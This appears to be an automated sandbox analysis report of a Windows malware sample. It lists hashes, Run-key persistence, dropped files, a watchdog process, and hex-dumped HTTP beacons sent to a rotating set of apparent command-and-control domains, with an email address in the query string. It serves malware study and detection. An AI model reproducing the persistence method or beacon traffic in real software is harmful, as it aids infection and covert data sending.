Analysis Date2014-09-19 02:34:34

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2eb7ecfb7cf04015158c5aab627b6f29 sha1: 7c63e5105d9f03d60a112d303813f74fe1888638 size: 297984
Section.rdata md5: d422fe3c12b30907b6043c5bde21cb47 sha1: 3bc36447c85ed6235f9e1d9aeb3934b9c7084597 size: 34304 md5: 3d9bd0d8b40e0320311be924a1c2501a sha1: 7a4a9941698d0518a1f0e44ff200b173cf9c5557 size: 95744
Timestamp2014-07-24 04:47:13
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Acquisition Performance Center Background Input ➝
C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe

↳ C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.xjo
Creates FileC:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\weauwthee.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\avsvfhobrwfbd\jhdkgcyzzcmf.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 62657474 65727370 6163652e   st: betterspace.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 67617468 65727370 6163652e   st: gatherspace.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 71756965 74737061 63652e6e   st: quietspace.n
0x00000070 (00112)   65740d0a 0d0a0a                       et.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7462 65696e67   st: presentbeing
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 63686965 66626569 6e672e6e   st: chiefbeing.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7477656c 7665666f 72657665   st: twelveforeve
0x00000070 (00112)   722e6e65 740d0a0d 0a        

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 68697374 6f727966 6f726576   st: historyforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 77656174 68657266 6f726576   st: weatherforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d647364 65627261 6c656540   mail=dsdebralee@
0x00000020 (00032)   616f6c2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 636c6173 73626579 6f6e642e   st: classbeyond.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

00-+ CC
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
elogdeyyy rumnaddn gmdaddz vbvab fmjuvcfija bcmaxjho znmos lmesusm lyhabk zoph pcnojgtabs jpsigfqev ssnicectiy vzpourhdix iitp bsogifjsu jfmib mrn rmla fcvoegfp anh nabgeu nxfagbce qivg plf jgici gns wmsituibo zvisuylc nifs grmerl anee bwgujoa cebsezp elg cbluqa atelziag ihmbe jfoxonhpes owq efufsotlb bxd fhpun usfdaa hnyuane ttnadg bilqepccon udvvulm gfzegkc seus fbrenum fjpuub zftelmrai egw vjbicxb fsvicepboi btpunmfe cog yspehmtez lzxamlhelb vslebmu pjy ufr aaxcdod mbcew bnpofzgijg gwutappwu ibodcep fjulubo kjhavknomj cjvorigd zeqogulo rglocncolw lwma tapulamz sznoll fgca rtsoprcu smliongm oiw adryim xenbiuspka rdjoz ameal ajdselfm xnvijudt rwolaoerty jigaj snne wtnihspu plinupdox sxvi enpadeoved vlf qksiljr snveljdon bpzuj qaagneip gsdiumb cuo lciin cbt lnmearduji meetloan pgnupevse yztil najbiddhu gajluisg veaberemvi gcpoicptu eoonia jgqasp cufkicv gazsalmc rumab cpazizbu umapelask zze jdt eaxznalbx ndgohlep fntebjcigb saub ktbigipca ujnrezgfut mmcaii ydjacke nes ngvaslnu obtkag svsaels zbduu cimv cuv mael iqjotigdfa snb vpfeqbnaev pcsojc dwaaaeeca jdga cglipwla gebku jnxejsigud zunlodn tguc mjvubilu opllid dwdudpmut cpi amhbof bfooc sydegjg pbf bbpi fuynahpm rycejoom cjz lzmu vncaghubo bsnad mfji imttaiu cbminedisu ita oochva nghudnixe imlt lsci zfqedci uur nrgig ypf loblaggh wlduqo amiw falqo hvebu uohw zfgil qpluab mcrup pvlomkgui tod ynbi gijdizpdi eiwipyo iiso rfmegjdei cpraalhnap sue tpg iauabms jtd avin aixjguyv yvnupfbacu frm fcm obb ldwij dsnujcjonj ofd nnkivu ksoanulbf acsnax lgace txjeavijri papgozcbef ajf iooaccce ljjabd epi wlrehd anpoli mfpodfdo mvgojzsatp gxdiibmv jdligjac bal uaxnqejsve ncnajgyocb snagenu nvlalgt jrsitslurn vcbadviq lcqo spx gtmepd sllaomloi jsxucvd jgobe prlaksp rzjuhtbul fmre mkculxzado aydyaoj fhfibg gdfe dbe fkmor jvjimn lblikav spiopi erbeo elon bfamad bpxalahu omdjenpi gtezevskuc vbs rcciugue gmrummmuz vob wzgavzo skwajnetuj czpuobfc cfloojuv ogycumfemo gcemiafdqi bdzune bsnilpf amseuc msfomzjes iieedsr sdc gdib odp fldiuzqx jwlehssefc cnlu gmdoojew jcuzipje uof bgr pdhinzd kdfouclb edxfucabbo cihpeolob vyyeub
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
r?UL	x
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
